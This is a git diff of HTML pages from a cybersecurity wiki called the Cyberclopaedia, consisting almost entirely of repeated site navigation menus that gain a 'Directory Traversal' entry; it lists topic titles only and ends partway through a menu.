IP Addres - - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v6 (IPv6).html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v6 (IPv6).html index b226ebf8..57a526f7 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v6 (IPv6).html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v6 (IPv6).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/index.html b/docs/Networking/Protocols/Internet Protocol (IP)/index.html index 32e9da15..607e2662 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/index.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Leightweight Directory Access Protocol (LDAP).html b/docs/Networking/Protocols/Leightweight Directory Access Protocol (LDAP).html index 9172653d..0e386ae6 100644 --- a/docs/Networking/Protocols/Leightweight Directory Access Protocol (LDAP).html +++ b/docs/Networking/Protocols/Leightweight Directory Access Protocol (LDAP).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
